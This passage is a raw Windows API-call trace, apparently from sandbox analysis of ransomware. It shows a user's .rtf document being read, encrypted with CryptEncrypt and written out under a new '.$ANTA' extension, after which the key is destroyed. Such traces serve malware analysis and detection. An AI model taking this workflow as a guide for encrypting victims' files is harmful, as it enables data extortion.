hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb270 | out: hHeap=0x1780000) returned 1 [0080.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43595f0 [0080.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb210 | out: hHeap=0x1780000) returned 1 [0080.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43596c0 [0080.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4051040 | out: hHeap=0x1780000) returned 1 [0080.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0080.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb228 | out: hHeap=0x1780000) returned 1 [0080.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0080.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a80 | out: hHeap=0x1780000) returned 1 [0080.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0080.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43595f0 | out: hHeap=0x1780000) returned 1 [0080.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0080.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0d8 | out: hHeap=0x1780000) returned 1 [0080.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0080.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0080.768] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431e220 [0080.768] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w")) returned 0x10 [0080.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431e220 | out: hHeap=0x1780000) returned 1 [0080.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0080.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43596c0 | out: hHeap=0x1780000) returned 1 [0080.768] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0080.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1b0 | out: hHeap=0x1780000) returned 1 [0080.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0080.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0080.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43fb3b0 [0080.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb108 [0080.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0080.769] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\bbYe6GX.rtf.$ANTA" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\bbye6gx.rtf.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0080.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0080.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0f0 [0080.769] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0080.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb180 | out: hHeap=0x1780000) returned 1 [0080.769] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb150 | out: hHeap=0x1780000) returned 1 [0080.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb168 | out: hHeap=0x1780000) returned 1 [0080.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0080.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0080.770] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0080.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0080.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0080.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0080.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d88 [0080.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0080.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0080.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0080.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0080.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0080.770] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0080.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0080.770] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0080.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0080.770] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0080.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0080.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0080.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0d8 [0080.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0080.770] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0080.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb150 [0080.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a90 [0080.770] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0080.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0080.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0080.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0080.771] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0080.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb270 [0080.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb348 [0080.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0080.771] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e0e020 [0080.774] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e7f8 | out: lpNewFilePointer=0x0) returned 1 [0080.774] ReadFile (in: hFile=0x258, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e820, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144e820*=0x7f03, lpOverlapped=0x0) returned 1 [0080.775] ReadFile (in: hFile=0x258, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e820, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144e820*=0x0, lpOverlapped=0x0) returned 1 [0080.775] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb348 | out: hHeap=0x1780000) returned 1 [0080.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0080.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb270 | out: hHeap=0x1780000) returned 1 [0080.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0080.776] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x7f03) returned 0x499a008 [0080.776] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e0e020 | out: hHeap=0x1780000) returned 1 [0080.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0d8 | out: hHeap=0x1780000) returned 1 [0080.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb150 | out: hHeap=0x1780000) returned 1 [0080.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0080.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0080.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0080.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x7f03) returned 0x49a1f18 [0080.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0080.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0080.779] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0080.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0080.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0080.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1c8 [0080.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0080.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0080.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x7f03) returned 0x499a008 [0080.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0080.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0080.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0080.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1c8 | out: hHeap=0x1780000) returned 1 [0080.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0080.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0080.780] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0080.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0080.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0080.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0080.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0080.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0080.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0080.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0080.780] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0080.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0080.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0080.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a80 [0080.780] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0080.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a80 | out: hHeap=0x1780000) returned 1 [0080.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0080.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0080.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2aa0 [0080.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0080.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb210 [0080.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0080.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0080.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x7f03) returned 0x499a008 [0080.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0080.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e29f0 [0080.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb348 [0080.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0080.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0080.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2a60 [0080.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1e0 [0080.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a90 [0080.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0080.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2950 [0080.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb120 [0080.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0080.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0080.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb168 [0080.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0080.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2a0 [0080.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0080.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb138 [0080.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0080.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x7f03) returned 0x49a9e28 [0080.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0080.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb198 [0080.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0080.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb198 | out: hHeap=0x1780000) returned 1 [0080.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0080.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0080.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0080.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1c8 [0080.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0080.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb240 [0080.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0080.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb198 [0080.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0080.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0080.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0080.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb378 | out: hHeap=0x1780000) returned 1 [0080.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2e8 | out: hHeap=0x1780000) returned 1 [0080.783] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0080.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0080.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0080.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0080.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2b8 | out: hHeap=0x1780000) returned 1 [0080.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb228 | out: hHeap=0x1780000) returned 1 [0080.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0080.784] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0080.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2e8 | out: hHeap=0x1780000) returned 1 [0080.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0080.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb378 | out: hHeap=0x1780000) returned 1 [0080.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0080.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2b8 | out: hHeap=0x1780000) returned 1 [0080.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0080.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb270 | out: hHeap=0x1780000) returned 1 [0080.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0080.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb360 | out: hHeap=0x1780000) returned 1 [0080.784] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0080.784] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0080.784] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0080.784] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796e88, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0080.784] CryptGetKeyParam (in: hKey=0x41ac780, dwParam=0x7, pbData=0x43e2a30, pdwDataLen=0x144db58, dwFlags=0x0 | out: pbData=0x43e2a30*=0x6610, pdwDataLen=0x144db58*=0x4) returned 1 [0080.784] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0080.785] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0080.785] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0080.785] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0080.785] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0080.785] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0080.785] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43c3638, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0080.785] CryptEncrypt (in: hKey=0x41ac780, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e088*=0x7f03, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e088*=0x7f10) returned 1 [0080.785] CharLowerBuffW (in: lpsz="byte[32529]", cchLength=0xb | out: lpsz="byte[32529]") returned 0xb [0080.785] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0080.785] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0080.785] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0080.785] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43c39f8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0080.786] CryptEncrypt (in: hKey=0x41ac780, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49b1d38*, pdwDataLen=0x144e088*=0x7f03, dwBufLen=0x7f10 | out: pbData=0x49b1d38*, pdwDataLen=0x144e088*=0x7f10) returned 1 [0080.786] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0080.786] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0080.786] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0080.787] WriteFile (in: hFile=0x298, lpBuffer=0x49d98c0*, nNumberOfBytesToWrite=0x7f10, lpNumberOfBytesWritten=0x144ea8c, lpOverlapped=0x0 | out: lpBuffer=0x49d98c0*, lpNumberOfBytesWritten=0x144ea8c*=0x7f10, lpOverlapped=0x0) returned 1 [0080.791] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0080.792] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0080.792] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0080.792] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0080.792] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43cb180, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0080.792] CryptDestroyKey (hKey=0x41ac780) returned 1 [0080.792] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0080.792] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0080.792] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0080.792] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0080.792] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0080.792] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0080.792] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0080.792] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0080.792] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: 